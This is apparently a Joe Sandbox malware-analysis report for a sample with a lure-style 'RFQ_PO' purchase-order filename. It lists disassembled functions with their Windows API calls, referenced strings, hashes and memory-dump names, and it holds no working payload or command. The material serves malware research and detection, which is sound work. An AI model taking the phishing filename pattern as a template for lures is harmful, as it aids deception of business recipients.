Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$CreateDestroy
String ID: ,$tooltips_class32
API String ID: 1109047481-3856767331
Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59

Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0045CCFA
__wsplitpath.LIBCMT ref: 0045CD3C
_wcscat.LIBCMT ref: 0045CD51
_wcscat.LIBCMT ref: 0045CD63
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
_wcscpy.LIBCMT ref: 0045CE14
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A

Strings

*.*, xrefs: 0045CE0E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 1153243558-438819550
Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E

Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455127
GetMenuItemInfoW.USER32 ref: 00455146
DeleteMenu.USER32(?,?,00000000), ref: 004551B2
DeleteMenu.USER32(?,?,00000000), ref: 004551C8
GetMenuItemCount.USER32(?), ref: 004551D9
SetMenu.USER32(?,00000000), ref: 004551E7
DestroyMenu.USER32(?,?,00000000), ref: 004551F4
DrawMenuBar.USER32 ref: 00455207
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Strings

0, xrefs: 0045511F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
String ID: 0
API String ID: 1663942905-4108050209
Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9

Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON

Download Yara Rule

APIs

__get_daylight.LIBCMT ref: 00415C47
__invoke_watson.LIBCMT ref: 00415C56
__get_daylight.LIBCMT ref: 00415C62
__invoke_watson.LIBCMT ref: 00415C71
__get_daylight.LIBCMT ref: 00415C7D
__invoke_watson.LIBCMT ref: 00415C8C
__gmtime64_s.LIBCMT ref: 00415CBD
__gmtime64_s.LIBCMT ref: 00415CF3

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
String ID:
API String ID: 1481289235-0
Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58

Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
SendMessageW.USER32 ref: 0046FBAF
SendMessageW.USER32 ref: 0046FBE2
ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
SendMessageW.USER32 ref: 0046FD00

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$IconImageList_$CreateExtractReplace
String ID:
API String ID: 2632138820-0
Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66

Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
LoadCursorW.USER32(00000000,00007F00), ref: 00433D06

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A

Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
_wcslen.LIBCMT ref: 00460B00
__swprintf.LIBCMT ref: 00460B9E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
GetDlgCtrlID.USER32(?), ref: 00460CE6
GetWindowRect.USER32(?,?), ref: 00460D21
GetParent.USER32(?), ref: 00460D40
ScreenToClient.USER32(00000000), ref: 00460D47
GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB

Strings

%s%u, xrefs: 00460B98

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
String ID: %s%u
API String ID: 1899580136-679674701
Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6

Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(?), ref: 0047D6D3

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

StringFromCLSID.OLE32(?,?), ref: 0047D6B5

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

StringFromIID.OLE32(?,?), ref: 0047D7F0
CoTaskMemFree.OLE32(?), ref: 0047D80A

Strings

0vH, xrefs: 0047D860
HH, xrefs: 0047D62E
inprocserver32, xrefs: 0047D725
ToolBoxBitmap32, xrefs: 0047D719
CLSID\, xrefs: 0047D6E1
ProgID, xrefs: 0047D74C
localserver32, xrefs: 0047D740
Interface\, xrefs: 0047D810

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FreeFromStringTask_wcslen$_wcscpy
String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
API String ID: 2485709727-934586222
Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A

Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045DB6C
_memset.LIBCMT ref: 0045DB89
CoInitialize.OLE32(00000000), ref: 0045DB99
SHGetMalloc.SHELL32(?), ref: 0045DBA8
_wcscpy.LIBCMT ref: 0045DBDB
SHGetDesktopFolder.SHELL32(?,?), ref: 0045DC38
_wcscpy.LIBCMT ref: 0045DC5B
_wcscpy.LIBCMT ref: 0045DCC2
SHBrowseForFolderW.SHELL32 ref: 0045DCF5
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DD13
CoUninitialize.OLE32 ref: 0045DD6B

Strings

HH, xrefs: 0045DD4A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
String ID: HH
API String ID: 3381189665-2761332787
Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A

Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00434585
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
CreateCompatibleDC.GDI32(00000000), ref: 0043459B
SelectObject.GDI32(00000000,?), ref: 004345A9
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665

Strings

(, xrefs: 0043464B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
String ID: (
API String ID: 3300687185-3887548279
Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66

Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
__swprintf.LIBCMT ref: 0045E4D9
_printf.LIBCMT ref: 0045E595
_printf.LIBCMT ref: 0045E5B7

Strings

Error: , xrefs: 0045E556
%s (%d) : ==> %s:%s%s, xrefs: 0045E590
Line %d (File "%s"):, xrefs: 0045E4BB, 0045E4CF
HH, xrefs: 0045E4D4, 0045E4C0, 0045E4C4, 0045E4D8
%s (%d) : ==> %s:, xrefs: 0045E5B2
^ ERROR , xrefs: 0045E523

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: LoadString_printf$__swprintf_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
API String ID: 3590180749-2894483878
Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A

Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0046F911
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
DeleteObject.GDI32(?), ref: 0046F950
DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
DeleteObject.GDI32(?), ref: 0046F9CF
DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
DestroyIcon.USER32(?), ref: 0046FA4F
SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
DeleteObject.GDI32(?), ref: 0046FA68
DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
String ID:
API String ID: 3412594756-0
Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A

Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

GetDriveTypeW.KERNEL32 ref: 0045DA30
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Strings

closed, xrefs: 0045D9F1, 0045DA19
wait, xrefs: 0045DA94
open, xrefs: 0045DA03
close cd wait, xrefs: 0045DAC6
close, xrefs: 0045D9DF
open , xrefs: 0045DA3F
type cdaudio alias cd wait, xrefs: 0045DA59
set cd door , xrefs: 0045DA7C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: SendString$_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 4013263488-4113822522
Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A

Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,00449505,?,?,00000001,00000001), ref: 00435A48
_wcslen.LIBCMT ref: 00435A59
_wcslen.LIBCMT ref: 00435A9B
_wcsncpy.LIBCMT ref: 00435AB0
_wcslen.LIBCMT ref: 00435ACF
_wcsncpy.LIBCMT ref: 00435AE4
_wcslen.LIBCMT ref: 00435B02
_wcsncpy.LIBCMT ref: 00435A7D

Part of subcall function 00413431: __wcstoi64.LIBCMT ref: 00413427

_wcslen.LIBCMT ref: 00435B12
_wcsncpy.LIBCMT ref: 00435B2B
_wcslen.LIBCMT ref: 00435B4C
_wcsncpy.LIBCMT ref: 00435B61
_wcslen.LIBCMT ref: 00435B7E
_wcsncpy.LIBCMT ref: 00435B93

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
String ID:
API String ID: 228034949-0
Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA

Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
